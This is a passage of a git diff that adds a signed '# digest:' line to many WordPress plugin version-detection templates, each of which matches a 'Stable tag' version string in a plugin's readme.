490a004630440220778d4580422182b2b1c1154e147b628a5171f998c8f4e91a4fb280db2b27672002206039f3da462bd19445929f109a56bb6c0c336a8f3fa80ff05c4a4def895aeee7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..b2f72d5311 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dcb5b1d246cdb94f83ac1c71a2e585fe6080a59e2cd31fdb6dcaae4508baee6a022100eb55d5d6a2cca3aea401f45af223e9b80ed2e19963fdaa108da5659f9095874e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..dfe9a084d6 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b44bdbbfdadbf3e228609b497171cedb84558058c3274ac3b48966aec30b8b53022100da17108a006961a25586597fc7d152a2a0314516df81e5cb35690c3bba37f586:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index d86e0557ae..9c4b7117bd 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c1e68312d1ff45008d007ba91639a82abbda8afa046fc019be595af7c061c97a02203f261773d256de3c13df218c708256b03ab27a038a0bac1b35be6e5a36da64de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..ed28215184 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022022d9d5d97972467d7307b8f85f4b18b7f9222f00542e31d07e1e4a046c9a1d1002201811dbdf200f4e87e9ad24f2d453d775d25a2fb3499b8699f7d31f5f0c1de736:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 4ae34395fa..1e94a2e6e4 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220327fd5ed9f3e666d23f4f1c7c928b96ac3c7331e2a1f4213d2ae6656ddbfd3f102203115a840ea5de3807f85a19661fb342a503d0440c6f0ce8ca95bb0258b835eb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..e37883ffdf 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206139eb00e53974097577281c92773510bca695aa3d6f8e94e6fd11157d3cbe33022100b1c7b1c5a62fa636c4f11f17a3159f1d5daaa3764fc82ff699acb868f6d63283:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..f4f7c01081 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206f30eaf22f5cdda9dc9bd43f9dff67184c1a211850b90138df80a917e507aeb8022100d40545a6d58daf2d085fb8fa1e1f03b15917dd5d1136359008d488df1bde9ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..b9aaf1c789 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f98a68c0f3a6ade42935187888ffe174830ce8431206328e82599a5da9adc989022056fded8f60af004f38dbfd92068067a756019c3c44649002618070a8f3c25a53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index aa36122d85..a971950090 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206bd171350ab49d8b39d4a702ed2146d140042ed6b2408b4cf4399be3b2a5467d0220269770701fd1081866e4c551d8aebce6ad58d37fa2228de535ec765d8318d959:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..e937938563 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bc9c41b8d8cb99f5681b89efe181053d82d731939d70c077c13061618a64100102205051fc6d5866f2399e5fc903ac5f627f154d94c87890a18659cffcc0414f522c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..a9f590164e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ac69c444e41095642acc72183436aaf45efe59e2ec3c8fb45f4436d37e76384022015388cf6bdd0e9b24635d5bf12d70e84a7de63456d0af84998a9f30ee29a4705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1d00a5705d..95d22503d7 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220528c93385a6ae0c3617e7ebc7a9dd6eb44b2e8184eec744715557d8b9967736f022100c80081b280dce2abd411d5cf7806938bfa2404be6fcf02d31ed580d0c5929ef1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..0f17abf592 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ef4be47ccb8b8ca448cec70006b456ce32135b1bbc956e12ce6d8de32195467d022100cc569215d713495121d5dc94bf279b4e184867dbb38902a04971c996fd908f84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..a8f3add5e1 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d843aa4c0e4da4955c2250d2e59821f68fae752b068f406841e91ef79f1bfd61022074911a03a6b652ab5175a08ffb95d4ce271dd08975a6e95147d24550978b88b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 3dbb03067b..1b83518d76 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eb9a2104a3f070db0eda69928a0c07cb56e4001b854c2bd100b4bc5b080c371e0221009c9995a470e7c2c30bf9a52b09ae9095885bd40838b05d022bf4cb32569cec23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..21f2467fe3 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204279ef7ec2d4d60e8f645900f1d366ac99beaf93fefdb91ba639cb0cca242598022100c26f06f193d32034aa7888f6b6dcc49a073f20094808049d0a477fdcccd15ab2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..02a3c1a274 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b423b8ede410897da835f2965976dd42cfd4e782d25aa79c487fd8adcc948f6d02204dda06ae887316afd4876b95d201eba64f4964b031d7d5181c32f955531cb091:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..cbed99e9e9 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204a1fa74fb28b200ee395d616faba04f944ecd5985b07634124291c81ff43294d022100858b60040c1b985a7f260517e655ba7f259d380f160018ed28e3e7dd73e18a1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..a958fe8603 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e1f28ef91cb547cdc91d1f860b8d6a290ed7fd154b65245a6df83f4f0310792302207eac5196ab5555ab008806dd26cc4353059e1bb8993d3095a33d15aac35e315f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..49ac6698a5 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009abf2ef18289f19a637c28656319f003e625a0b9b4de78179e76c09fb905ff6a022100b5428c5f7bb7853b3d15494124b9d5cf78938d9f01349a8e8560b62feb9cfa07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..edce061f6f 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100acd4eae7e08e0d086ef24c791d42a933e24780e98acdae2500e313b683d5059e022100cdbff1288a06ef48a31d743658e39d4345ccf88bf3c47749b6cd716f4de91308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..62a3d22acb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202256cf6f782410dc5090c6bea474fd6dadebfe6938888fa2c6e81db135ee395302202ba702c0081a2265032308786010c126687198394b32da02298435dfd6cf363c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..bc5959d77b 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a5fd9c8d4874b276f49a5d4ecc674daca21582bfa2cbd83b99d907100f8903a102202ba5ced28247a0d221f8e81d59a80bf359a0c0eb58f270251630da64f67a753a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..aa1998c856 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204af622448b78b80c45cfd3b99169b528bf5874f0b70b16c5d73845c3b7a784c5022050f995526442731d018c3273720687e74f189220fde461d3643460f529225a84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..9da1fe8705 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fa4c6694486da7ba36d9a98f22b824bf449072f228a6bb9ebc171558a3ba7ffb0221009b03e94116b9d8c85a0732eb9cc6165ad7e86a34f664345b1cbb588a32c96a95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..578ceb8b59 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c1d30cfa831c35d10a7d054cb07f157e8d6a4341c979727c771fff03db90c04b022014a4e495ec0631c2474959293f973178405d784ae69f5cb51b042a475aa91db8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..9d39ad8310 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220290c84b4f94c66bae0faf11badb1608323763ebedbadea52da214976f5573ac8022069025656ffe3f3445bdef6bc2626d4f6eec4892413c6a36e15e097017b33dda6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..b1fdf84722 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a36dc00c3e63c5cf01841a03a1bfc729dc100885ccfac7620e83a75f1d340f2202203db6422932f20abe3a08967aecab00bf2e43a5d75b56ad54f9d9119083bd0c0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..8bb8b22622 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ae1b785251de676edb806ba9ebaf03a43de0359ea4bec5800e2fc5cc72cef10a022100cfb876ce09f35961bf77be7574a4673015f7b4d519d0016480ebefdb8e2a2336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index cd248e018b..cd3f80cbe1 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e18e3ade32c1c9cb2463116a80d01fd5c97d8271af36955dad246d6d48c3206a0221008d104741dba7f1d13c2b2daead6469d18e7287a3479f0bf99b3f8f9eeef36cd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 0993372ced..6fb68580c0 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009306b2696b5597db10a083ed5659670cbc199222e7c145783a9d1e8c334b10070220551ec4c5f71b31a95748876576ecf5fa777e25add8c91f08e511f34a78333eb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 7e62a84cca..e3d5ed32e7 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b0fd6ef06c2720382ede82db58559b8fb4f2a84c506cedad6a586c9ced466c42022100ea40836194a6574b56398679b13d8af5c1c0515c6537e8cac0bde66f90da99e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..574c44f1c7 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b426bd27e56f26cba6d3d2c32f4364ba39d56f9cb988fee076650a24d497c51b022100812453d4f89abde4640e166f13fddfda6b43366ef6611b80525c77d3b0ee31a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..80907e357b 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cdfbcd01328bb76484969176b91b835295d56471a231a735cf922707363558bf022100e26cb716f77735c89a01438c5329976d57fe156df9ca4f74a31932e36a81f7e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c7ae2d51dd..63ccf92370 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100deb8e58412536eb0491aa1720df540a710fabaa4b38599036eafa3b3ba6cd0dd02207c8720ede2effeee51b0073cd58810131e41dc14f267af5a0d1cde33fd39dff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..6f98718f0a 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022036baa65eda2b326222095336490e037f73d65608570781c9a5a9683d78debf7a0220334ffa0e5bdef7137e5fd9c9dce6e9c8e0e8d687891e6f3f5b573620039687fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..3e460799aa 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220408e2e4e8f72e94249af32eeda44f9279c53bbacc5940f2d32adb4fdf08ac235022100cc67cca4948a9d656d2fdc1bf1d0ad2f9b31e48f36d449cb017437e4416cb5ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..76e4e4c71e 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c0b5df059977953eabe1bf848821398fd6535989afa5591859eba3d84af504d702203aa979a0b77e19408b24f2f8895a5f9ae8a54c6d759a7867df159ba4c693f4a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..f2f4df8507 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a31b74324012e7663994f9c9e485502e3d6ebbd0534d086f760702a28fef42580221009c41f9a051dca9257da06cccbc2a11c973916782c7d85c58a5c857841e1adea0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 299e5e4cb6..4996a78715 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a082938ceb148b1b6edb7fd1737e2faf9913df557ae3e9006d6301a7dd272ce002203bf94abfe3b4fd07b91c2c6be3deb2662f6938a1ce42c2ff6cffa59778690672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..6395a49dbd 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a490e13a60e41cc4dd35568fbc7233514b94fda479d8d1d6e70c74fd4e0ddf550220649416b8cdb6b82b3ef690754304121ef9ebc6f4626758dae088fdf2172888c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..7036ed3573 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ee609819c3e4510dde8b5409c86d8a02120c1da051e5dca31d7213f4332f776202203b5ed0f143a6e684abb635c1dd4a725a0abce9e11f1621a909244fd23ea5f84e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..6d05262166 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100846316266a3e61913ad5a785d86a88b28434c68c0ecb4a31e003988ffd8e754102210092381d5e15999ddb3b6ef0ba4f80738843b3b565a32f5c23cb585717396148a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..d3f07ac9b7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fa5b9dd85ef276134947873898540f67fec69d04915b66eb120fce01f8f2a9da022100d6f6dcec37806c8abf3f2b1f6e86925845b2972273532e9cd10b16dfad4e922c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..79a14921d7 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022015e10e4b42630ffe1066822cc78ef1b8d9c921a90b2f8daf80f56fd59862250a0220257cd945984ce8b188fb61cab2c190fec2db1b1dbccdc59a5ec24e362f6a0f31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..63f6b0fcf0 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d8b2452cd295bd5493055486c29c92457bdd37b1442b03b8a287d0dbc1fb1de5022100f85822504e303f50f6ea5403edc622bdbba0d2f2e4178cdbca67f92ba876664b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..ea8ce219b7 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206eeee9fef9e42e9efe2d8af2da7f21957af6ae30bd4d5f7ff8c898472db1bb81022100c0b3c7b3c8c2305582228b01f5a8861e0b6c3f26ed577a05ca8dd8fbaeb225c4:922c64590222798bb761d5b6d8e72950 \ No 